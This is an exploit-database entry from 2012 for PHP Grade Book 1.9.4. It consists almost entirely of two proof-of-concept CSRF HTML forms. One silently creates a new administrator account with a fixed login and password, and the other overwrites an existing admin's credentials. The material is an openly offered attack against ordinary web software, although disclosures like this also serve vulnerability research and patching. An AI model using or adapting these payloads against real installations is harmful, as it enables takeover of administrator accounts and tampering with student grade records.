PHP Grade Book 1.9.4 Multiple CSRF Vulnerability

2012-05-13T00:00:00
ID 1337DAY-ID-18248
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2012-05-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            PHP Grade Book 1.9.4 Multiple CSRF Vulnerability
====================================================================
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [[email protected]]
.:. Script         : http://www.phpgradebook.com/
.:. Tested On Demo : http://www.phpgradebook.com/demo/admin/
.:. Gr34T$ T0 [aboud-el]
####################################################################
===[ Exploit ]===
[1]Add Admin
============
<html>
<head>
<title>PHP Grade Book [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/admin/index.php?action=InsertNewAdmin">
<input type="hidden" name="NewRealName" value="Master Admin"/>
<input type="hidden" name="NewLoginName" value="Webadmin"/>
<input type="hidden" name="NewPassword" value="123456"/>
</form>
</body>
</html>
 
[2]Edit Account Admin
======================
<html>
<head>
<title>PHP Grade Book [Edit Account Admin]</title>
</head>
<H2>CSRF Edit Account Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/admin/index.php?action=EditAdmin">
<input type="hidden" name="RealName" value="Master Admin"/>
<input type="hidden" name="LoginName" value="Webadmin"/>
<input type="hidden" name="Password" value="123456"/>
<input type="hidden" name="AdminID" value="1"/>
<input type="hidden" name="Password2" value="123456"/>
<input type="hidden" name="AdminID" value="1"/>
</form>
</body>
</html>
####################################################################



#  0day.today [2018-04-13]  #